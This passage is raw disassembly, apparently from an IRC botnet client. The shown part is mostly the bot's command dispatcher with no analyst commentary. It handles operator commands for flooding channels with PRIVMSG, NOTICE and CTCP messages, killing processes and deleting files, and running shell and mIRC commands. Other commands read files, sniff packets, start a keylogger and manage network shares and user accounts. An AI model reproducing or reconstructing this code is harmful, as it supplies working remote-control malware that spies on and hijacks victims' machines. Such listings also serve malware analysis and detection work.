lea eax, [ebp+var_4BC]
push eax ; Dest
call sub_417E84
pop ecx
lea eax, [ebp+var_4BC]
push eax
lea eax, [ebp+Dst]
push offset aNickS_0 ; "NICK %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_417B2F
add esp, 10h
loc_405289: ; CODE XREF: sub_401ACD+36C3�j
; sub_401ACD+36D2�j
push edi ; Str2
push offset aChgnick ; "chgnick"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4052CE
lea eax, [ebp+var_180C]
push eax ; Dest
call sub_417E84
pop ecx
lea eax, [ebp+var_180C]
push eax
lea eax, [ebp+Dst]
push offset aNickS_0 ; "NICK %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_417B2F
add esp, 10h
loc_4052CE: ; CODE XREF: sub_401ACD+37CB�j
push edi ; Str2
push offset aMsg ; "msg"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_4053C3
cmp [ebp+esi+Format], ebx
jz loc_4053C3
push [ebp+esi+Format]
lea eax, [ebp+Dst]
push offset aJoinS ; "join %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_417B2F
add esp, 10h
lea eax, [ebp+Dst]
push offset dword_427624
push [ebp+esi+Format]
push offset aPrivmsgSS ; "privmsg %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_417B2F
add esp, 14h
call _rand
cdq
mov ecx, 3E8h
idiv ecx
push edx
call ds:dword_427080 ; Sleep
push offset dword_427624
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aPrivmsgSS ; "privmsg %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_417B2F
add esp, 14h
call _rand
cdq
mov ecx, 384h
idiv ecx
push edx
call ds:dword_427080 ; Sleep
push offset dword_427624
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aPrivmsgSS ; "privmsg %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_417B2F
add esp, 14h
loc_4053C3: ; CODE XREF: sub_401ACD+3810�j
; sub_401ACD+381D�j
push edi ; Str2
push offset aNotice_0 ; "notice"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_4054B8
cmp [ebp+esi+Format], ebx
jz loc_4054B8
push [ebp+esi+Format]
lea eax, [ebp+Dst]
push offset aJoinS ; "join %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_417B2F
add esp, 10h
lea eax, [ebp+Dst]
push offset dword_427624
push [ebp+esi+Format]
push offset aNoticeSS_1 ; "NOTICE %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_417B2F
add esp, 14h
call _rand
cdq
mov ecx, 3E8h
idiv ecx
push edx
call ds:dword_427080 ; Sleep
push offset dword_427624
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aNoticeSS_1 ; "NOTICE %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_417B2F
add esp, 14h
call _rand
cdq
mov ecx, 384h
idiv ecx
push edx
call ds:dword_427080 ; Sleep
push offset dword_427624
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aNoticeSS_1 ; "NOTICE %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_417B2F
add esp, 14h
loc_4054B8: ; CODE XREF: sub_401ACD+3905�j
; sub_401ACD+3912�j
push edi ; Str2
push offset aCtcp ; "ctcp"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_4055D9
cmp [ebp+esi+Format], ebx
jz loc_4055D9
push [ebp+esi+Format]
lea eax, [ebp+Dst]
push offset aJoinS ; "join %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_417B2F
add esp, 10h
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aPrivmsgS_1 ; "PRIVMSG %s :"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_417B2F
add esp, 10h
call _rand
cdq
mov ecx, 514h
idiv ecx
push edx
call ds:dword_427080 ; Sleep
push [ebp+esi+Format]
lea eax, [ebp+Dst]
push offset aPrivmsgS_2 ; "PRIVMSG %s :"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_417B2F
add esp, 10h
call _rand
cdq
mov ecx, 514h
idiv ecx
push edx
call ds:dword_427080 ; Sleep
push [ebp+esi+Format]
lea eax, [ebp+Dst]
push offset aPrivmsgS_3 ; "PRIVMSG %s :"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_417B2F
add esp, 10h
call _rand
cdq
mov ecx, 514h
idiv ecx
push edx
call ds:dword_427080 ; Sleep
push [ebp+esi+Format]
lea eax, [ebp+Dst]
push offset aPrivmsgS_3 ; "PRIVMSG %s :"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_417B2F
add esp, 10h
loc_4055D9: ; CODE XREF: sub_401ACD+39FA�j
; sub_401ACD+3A07�j
push edi ; Str2
push offset aMix ; "mix"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_405709
cmp [ebp+esi+Format], ebx
jz loc_405709
push [ebp+esi+Format]
lea eax, [ebp+Dst]
push offset aJoinS ; "join %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_417B2F
add esp, 10h
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aPrivmsgS_1 ; "PRIVMSG %s :"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_417B2F
add esp, 10h
call _rand
cdq
mov ecx, 514h
idiv ecx
push edx
call ds:dword_427080 ; Sleep
push offset dword_427624
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aNoticeSS_1 ; "NOTICE %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_417B2F
add esp, 14h
call _rand
cdq
mov ecx, 514h
idiv ecx
push edx
call ds:dword_427080 ; Sleep
push offset dword_427624
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aPrivmsgSS_0 ; "PRIVMSG %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_417B2F
add esp, 14h
call _rand
cdq
mov ecx, 514h
idiv ecx
push edx
call ds:dword_427080 ; Sleep
push offset dword_427624
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aNoticeSS_1 ; "NOTICE %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_417B2F
add esp, 14h
loc_405709: ; CODE XREF: sub_401ACD+3B1B�j
; sub_401ACD+3B28�j
push edi ; Str2
push offset aRegister ; "register"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40574D
mov eax, [ebp+esi+Str2]
cmp eax, ebx
jz short loc_40574D
push eax
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aNickservRegist ; "nickserv register %s %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_417B2F
add esp, 14h
loc_40574D: ; CODE XREF: sub_401ACD+3C4B�j
; sub_401ACD+3C56�j
push edi ; Str2
push offset Str2 ; "off"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_40619B
mov [ebp+arg_18], offset dword_4D4A5C
loc_405769: ; CODE XREF: sub_401ACD+3CC0�j
mov eax, [ebp+arg_18]
cmp dword ptr [eax-4], 1
jnz short loc_40577F
mov eax, [eax]
cmp eax, ebx
jbe short loc_40577F
push eax
call dword_4CBA6C ; closesocket
loc_40577F: ; CODE XREF: sub_401ACD+3CA3�j
; sub_401ACD+3CA9�j
add [ebp+arg_18], 210h
cmp [ebp+arg_18], offset byte_4DB17C
jl short loc_405769
cmp [ebp+var_8], ebx
jnz loc_40619B
push ebx ; int
push [ebp+var_4] ; int
push offset unk_42B784 ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409869
add esp, 14h
jmp loc_40619B
; ---------------------------------------------------------------------------
loc_4057B7: ; CODE XREF: sub_401ACD+3151�j
push [ebp+arg_8] ; Str2
push offset aNick_0 ; "nick"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409554
push [ebp+arg_8] ; Str2
push offset aN ; "n"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409554
push [ebp+arg_8] ; Str2
push offset aJoin ; "join"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409531
push [ebp+arg_8] ; Str2
push offset aJ ; "j"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409531
push [ebp+arg_8] ; Str2
push offset aPart_0 ; "part"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409515
push [ebp+arg_8] ; Str2
push offset aPt ; "pt"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409515
push [ebp+arg_8] ; Str2
push offset aRaw ; "raw"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4094DB
push [ebp+arg_8] ; Str2
push offset aR ; "r"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4094DB
push [ebp+arg_8] ; Str2
push offset aKillthread ; "killthread"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409418
push [ebp+arg_8] ; Str2
push offset aK ; "k"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409418
push [ebp+arg_8] ; Str2
push offset aC_quit ; "c_quit"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40936D
push [ebp+arg_8] ; Str2
push offset aC_q ; "c_q"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40936D
push [ebp+arg_8] ; Str2
push offset aC_rndnick ; "c_rndnick"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40931F
push [ebp+arg_8] ; Str2
push offset aC_rn ; "c_rn"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40931F
push [ebp+arg_8] ; Str2
push offset aPrefix ; "prefix"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40930A
push [ebp+arg_8] ; Str2
push offset aPr ; "pr"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40930A
push [ebp+arg_8] ; Str2
push offset aOpen ; "open"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4092E0
push [ebp+arg_8] ; Str2
push offset aO ; "o"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4092E0
push [ebp+arg_8] ; Str2
push offset aServer_1 ; "server"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4092C7
push [ebp+arg_8] ; Str2
push offset aSe ; "se"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4092C7
push [ebp+arg_8] ; Str2
push offset aDns ; "dns"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40925F
push [ebp+arg_8] ; Str2
push offset aDn ; "dn"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40925F
push [ebp+arg_8] ; Str2
push offset aKillproc ; "killproc"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409233
push [ebp+arg_8] ; Str2
push offset aKp ; "kp"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409233
push [ebp+arg_8] ; Str2
push offset aKill ; "kill"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4091D8
push [ebp+arg_8] ; Str2
push offset aKi ; "ki"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4091D8
push [ebp+arg_8] ; Str2
push offset aDelete ; "delete"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4091A0
push [ebp+arg_8] ; Str2
push offset aDel ; "del"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4091A0
push [ebp+arg_8] ; Str2
push offset aGet_1 ; "get"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4090C3
push [ebp+arg_8] ; Str2
push offset aGt ; "gt"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4090C3
push [ebp+arg_8] ; Str2
push offset aList ; "list"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4090A5
push [ebp+arg_8] ; Str2
push offset aLi ; "li"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4090A5
push [ebp+arg_8] ; Str2
push offset aVisit ; "visit"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408FB5
push [ebp+arg_8] ; Str2
push offset aV ; "v"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408FB5
push [ebp+arg_8] ; Str2
push offset aMirccmd ; "mirccmd"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408F6F
push [ebp+arg_8] ; Str2
push offset aMirc ; "mirc"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408F6F
push [ebp+arg_8] ; Str2
push offset aCmd ; "cmd"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408F18
push [ebp+arg_8] ; Str2
push offset aCm ; "cm"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408F18
push [ebp+arg_8] ; Str2
push offset aReadfile ; "readfile"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408EA1
push [ebp+arg_8] ; Str2
push offset aRf ; "rf"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408EA1
push [ebp+arg_8] ; Str2
push offset aPsniff ; "psniff"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_405C9F
push edi ; Str2
push offset aOn ; "on"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_405C67
push 20h
call sub_40B602
test eax, eax
pop ecx
jle short loc_405B91
push offset dword_42B68C
jmp loc_406E22
; ---------------------------------------------------------------------------
loc_405B91: ; CODE XREF: sub_401ACD+40B8�j
mov eax, [ebp+arg_4]
mov esi, [ebp+esi+Format]
mov [ebp+var_F5C], eax
mov eax, [ebp+var_4]
mov [ebp+var_ED4], eax
mov eax, [ebp+var_8]
cmp esi, ebx
mov [ebp+var_ED0], eax
jnz short loc_405BD3
mov esi, offset aF_1 ; "#f"
push offset byte_43DB88 ; Str2
push esi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_405BD3
mov esi, [ebp+Format]
loc_405BD3: ; CODE XREF: sub_401ACD+40E8�j
; sub_401ACD+40FE�j
push esi ; Format
lea eax, [ebp+var_F58]
push 80h ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
lea eax, [ebp+Dst]
push offset asc_42B65C ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 20h ; int
push eax ; Source
call sub_40B3BA
add esp, 14h
mov [ebp+var_ED8], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_F5C]
push ebx
push eax
push offset sub_412B61
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_ED8]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_405C56
loc_405C40: ; CODE XREF: sub_401ACD+4187�j
cmp [ebp+var_ECC], ebx
jnz loc_4081AD
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_405C40
; ---------------------------------------------------------------------------
loc_405C56: ; CODE XREF: sub_401ACD+4171�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset dword_42B620
jmp loc_408E86
; ---------------------------------------------------------------------------
loc_405C67: ; CODE XREF: sub_401ACD+40A8�j
push edi ; Str2
push offset Str2 ; "off"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_4081AD
push ebx
push 20h
call sub_40B5B5
pop ecx
cmp eax, ebx
pop ecx
jle short loc_405C95
push eax
push offset dword_42B5E4
jmp loc_408E86
; ---------------------------------------------------------------------------
loc_405C95: ; CODE XREF: sub_401ACD+41BB�j
push offset dword_42B5B8
jmp loc_406E22
; ---------------------------------------------------------------------------
loc_405C9F: ; CODE XREF: sub_401ACD+4093�j
push [ebp+arg_8] ; Str2
push offset aSniffer ; "sniffer"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_405DEF
push edi ; Str2
push offset aOn ; "on"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_405DB7
push 21h
call sub_40B602
test eax, eax
pop ecx
jle short loc_405CE1
push offset unk_42B590
jmp loc_406E22
; ---------------------------------------------------------------------------
loc_405CE1: ; CODE XREF: sub_401ACD+4208�j
mov eax, [ebp+arg_4]
mov esi, [ebp+esi+Format]
mov [ebp+var_EC8], eax
mov eax, [ebp+var_4]
mov [ebp+var_E40], eax
mov eax, [ebp+var_8]
cmp esi, ebx
mov [ebp+var_E3C], eax
jnz short loc_405D23
mov esi, offset aF_1 ; "#f"
push offset byte_43DB88 ; Str2
push esi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_405D23
mov esi, [ebp+Format]
loc_405D23: ; CODE XREF: sub_401ACD+4238�j
; sub_401ACD+424E�j
push esi ; Format
lea eax, [ebp+var_EC4]
push 80h ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
lea eax, [ebp+Dst]
push offset asc_42B564 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 21h ; int
push eax ; Source
call sub_40B3BA
add esp, 14h
mov [ebp+var_E44], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_EC8]
push ebx
push eax
push offset sub_4131EC
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_E44]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_405DA6
loc_405D90: ; CODE XREF: sub_401ACD+42D7�j
cmp [ebp+var_E38], ebx
jnz loc_4081AD
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_405D90
; ---------------------------------------------------------------------------
loc_405DA6: ; CODE XREF: sub_401ACD+42C1�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42B528
jmp loc_408E86
; ---------------------------------------------------------------------------
loc_405DB7: ; CODE XREF: sub_401ACD+41F8�j
push edi ; Str2
push offset Str2 ; "off"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_4081AD
push ebx
push 21h
call sub_40B5B5
pop ecx
cmp eax, ebx
pop ecx
jle short loc_405DE5
push eax
push offset unk_42B4EC
jmp loc_408E86
; ---------------------------------------------------------------------------
loc_405DE5: ; CODE XREF: sub_401ACD+430B�j
push offset unk_42B4C0
jmp loc_406E22
; ---------------------------------------------------------------------------
loc_405DEF: ; CODE XREF: sub_401ACD+41E3�j
push [ebp+arg_8] ; Str2
push offset aIdent ; "ident"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_405EC2
push edi ; Str2
push offset aOn ; "on"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_405E8A
push 2
call sub_40B602
test eax, eax
pop ecx
jle short loc_405E2D
push offset dword_42B498
jmp loc_406E22
; ---------------------------------------------------------------------------
loc_405E2D: ; CODE XREF: sub_401ACD+4354�j
lea eax, [ebp+Dst]
push offset asc_42B46C ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 2 ; int
push eax ; Source
call sub_40B3BA
add esp, 14h
mov esi, eax
lea eax, [ebp+var_10]
push eax
push ebx
push esi
push offset sub_410BFD
push ebx
push ebx
call ds:dword_427084 ; CreateThread
imul esi, 234h
cmp eax, ebx
mov dword_43E924[esi], eax
jnz loc_4081AD
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset dword_42B438
jmp loc_408E86
; ---------------------------------------------------------------------------
loc_405E8A: ; CODE XREF: sub_401ACD+4348�j
push edi ; Str2
push offset Str2 ; "off"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_4081AD
push ebx
push 2
call sub_40B5B5
pop ecx
cmp eax, ebx
pop ecx
jle short loc_405EB8
push eax
push offset dword_42B400
jmp loc_408E86
; ---------------------------------------------------------------------------
loc_405EB8: ; CODE XREF: sub_401ACD+43DE�j
push offset dword_42B3E0
jmp loc_406E22
; ---------------------------------------------------------------------------
loc_405EC2: ; CODE XREF: sub_401ACD+4333�j
push [ebp+arg_8] ; Str2
push offset aKeyloger ; "keyloger"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408D24
push [ebp+arg_8] ; Str2
push offset aKeylog ; "keylog"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408D24
push [ebp+arg_8] ; Str2
push offset aStop ; "stop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408CFB
push [ebp+arg_8] ; Str2
push offset aStop ; "stop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408CFB
push [ebp+arg_8] ; Str2
push offset aNet ; "net"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_40616D
cmp dword_4CBAA4, ebx
jz short loc_405F4F
cmp dword_4CBACC, ebx
jz short loc_405F4F
push offset unk_42B388
jmp loc_4084F5
; ---------------------------------------------------------------------------
loc_405F4F: ; CODE XREF: sub_401ACD+446E�j
; sub_401ACD+4476�j
cmp [ebp+var_C], ebx
jz loc_406BFE
mov eax, [ebp+esi+Format]
mov [ebp+Src], ebx
cmp eax, ebx
mov [ebp+arg_18], eax
jz short loc_405F77
push eax ; SubStr
push [ebp+var_C] ; Str
call _strstr
pop ecx
mov [ebp+Src], eax
pop ecx
loc_405F77: ; CODE XREF: sub_401ACD+449A�j
push edi ; Str2
push offset aStart ; "start"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_405FC3
cmp [ebp+arg_18], ebx
jz short loc_405F97
push [ebp+Src]
push 3
jmp loc_406021
; ---------------------------------------------------------------------------
loc_405F97: ; CODE XREF: sub_401ACD+44BE�j
push [ebp+var_4] ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_418EA8
add esp, 0Ch
test eax, eax
jz short loc_405FB9
push offset unk_42B35C
jmp loc_4084F5
; ---------------------------------------------------------------------------
loc_405FB9: ; CODE XREF: sub_401ACD+44E0�j
push offset unk_42B33C
jmp loc_4084F5
; ---------------------------------------------------------------------------
loc_405FC3: ; CODE XREF: sub_401ACD+44B9�j
push edi ; Str2
push offset aStop ; "stop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_405FDB
push [ebp+Src]
push 4
jmp short loc_406021
; ---------------------------------------------------------------------------
loc_405FDB: ; CODE XREF: sub_401ACD+4505�j
push edi ; Str2
push offset aPause ; "pause"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_405FF3
push [ebp+Src]
push 5
jmp short loc_406021
; ---------------------------------------------------------------------------
loc_405FF3: ; CODE XREF: sub_401ACD+451D�j
push edi ; Str2
push offset aContinue ; "continue"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40600B
push [ebp+Src]
push 6
jmp short loc_406021
; ---------------------------------------------------------------------------
loc_40600B: ; CODE XREF: sub_401ACD+4535�j
push edi ; Str2
push offset aDelete ; "delete"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_406033
push [ebp+Src]
push 1
loc_406021: ; CODE XREF: sub_401ACD+44C5�j
; sub_401ACD+450C�j ...
call sub_418C0E
pop ecx
pop ecx
loc_406028: ; CODE XREF: sub_401ACD+459F�j
; sub_401ACD+4628�j ...
push eax
push offset aS_6 ; "%s"
jmp loc_406BEF
; ---------------------------------------------------------------------------
loc_406033: ; CODE XREF: sub_401ACD+454D�j
push edi ; Str2
push offset aShare ; "share"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40609B
cmp [ebp+arg_18], ebx
jz short loc_40606E
cmp [ebp+var_8FC], bl
jz short loc_406059
push ebx
push [ebp+arg_18]
push 1
jmp short loc_406064
; ---------------------------------------------------------------------------
loc_406059: ; CODE XREF: sub_401ACD+4582�j
push [ebp+esi+Str2] ; int
push [ebp+arg_18] ; Str
push ebx ; int
loc_406064: ; CODE XREF: sub_401ACD+458A�j
call sub_418FE5
add esp, 0Ch
jmp short loc_406028
; ---------------------------------------------------------------------------
loc_40606E: ; CODE XREF: sub_401ACD+457A�j
push ebx ; int
push [ebp+var_4] ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_4191DB
add esp, 10h
test eax, eax
jz short loc_406091
push offset unk_42B2FC
jmp loc_4084F5
; ---------------------------------------------------------------------------
loc_406091: ; CODE XREF: sub_401ACD+45B8�j
push offset unk_42B2DC
jmp loc_4084F5
; ---------------------------------------------------------------------------
loc_40609B: ; CODE XREF: sub_401ACD+4575�j
push edi ; Str2
push offset aUser_0 ; "user"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_406127
mov eax, [ebp+arg_18]
cmp eax, ebx
jz short loc_4060FA
cmp [ebp+var_8FC], bl
jz short loc_4060CD
push [ebp+var_4]
push [ebp+Format]
push [ebp+arg_4]
push ebx
push eax
push 1
jmp short loc_4060ED
; ---------------------------------------------------------------------------
loc_4060CD: ; CODE XREF: sub_401ACD+45EC�j
push [ebp+var_4] ; int
mov esi, [ebp+esi+Str2]
cmp esi, ebx
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
jz short loc_4060E9
push esi
push eax
push ebx
jmp short loc_4060ED
; ---------------------------------------------------------------------------
loc_4060E9: ; CODE XREF: sub_401ACD+4615�j
push ebx ; int
push eax ; int
push 2 ; int
loc_4060ED: ; CODE XREF: sub_401ACD+45FE�j
; sub_401ACD+461A�j
call sub_4192FC
add esp, 18h
jmp loc_406028
; ---------------------------------------------------------------------------
loc_4060FA: ; CODE XREF: sub_401ACD+45E4�j
push ebx ; int
push [ebp+var_4] ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_41982C
add esp, 10h
test eax, eax
jz short loc_40611D
push offset unk_42B2BC
jmp loc_4084F5
; ---------------------------------------------------------------------------
loc_40611D: ; CODE XREF: sub_401ACD+4644�j
push offset unk_42B29C
jmp loc_4084F5
; ---------------------------------------------------------------------------
loc_406127: ; CODE XREF: sub_401ACD+45DD�j
push edi ; Str2
push offset aSend_0 ; "send"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_406163
cmp [ebp+arg_18], ebx
jz short loc_406159
push [ebp+var_4]
push [ebp+Format]
push [ebp+arg_4]
push [ebp+Src] ; Source
call sub_419AE0
add esp, 10h
jmp loc_406028
; ---------------------------------------------------------------------------
loc_406159: ; CODE XREF: sub_401ACD+466E�j
push offset unk_42B270
jmp loc_4084F5
; ---------------------------------------------------------------------------
loc_406163: ; CODE XREF: sub_401ACD+4669�j
push offset unk_42B254
jmp loc_4084F5
; ---------------------------------------------------------------------------
loc_40616D: ; CODE XREF: sub_401ACD+4462�j
push [ebp+arg_8] ; Str2
push offset aGethost ; "gethost"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408C0D
push [ebp+arg_8] ; Str2
push offset aGh ; "gh"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408C0D
loc_40619B: ; CODE XREF: sub_401ACD+3C8F�j
; sub_401ACD+3CC5�j ...
mov eax, [ebp+esi+Format]
cmp eax, ebx
mov [ebp+arg_18], eax
jz loc_401F75
push [ebp+arg_8] ; Str2
push offset aKilllog ; "killlog"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408BF0
push [ebp+arg_8] ; Str2
push offset aKl ; "kl"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408BF0
push [ebp+arg_8] ; Str2
push offset aAddalias ; "addalias"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408BBE
push [ebp+arg_8] ; Str2
push offset aAa ; "aa"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408BBE
push [ebp+arg_8] ; Str2
push offset aPrivmsg_0 ; "privmsg"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408B6D
push [ebp+arg_8] ; Str2
push offset aPm ; "pm"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408B6D
push [ebp+arg_8] ; Str2
push offset aAction ; "action"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408B04
push [ebp+arg_8] ; Str2
push offset aA ; "a"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408B04
push [ebp+arg_8] ; Str2
push offset aCycle ; "cycle"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408A9E
push [ebp+arg_8] ; Str2
push offset aCy ; "cy"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408A9E
push [ebp+arg_8] ; Str2
push offset aMode ; "mode"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408A64
push [ebp+arg_8] ; Str2
push offset aM_0 ; "m"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408A64
push [ebp+arg_8] ; Str2
push offset aC_raw ; "c_raw"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4089F6
push [ebp+arg_8] ; Str2
push offset aC_r ; "c_r"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4089F6
push [ebp+arg_8] ; Str2
push offset aC_mode ; "c_mode"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408971
push [ebp+arg_8] ; Str2
push offset aC_m ; "c_m"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408971
push [ebp+arg_8] ; Str2
push offset aC_nick ; "c_nick"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408900
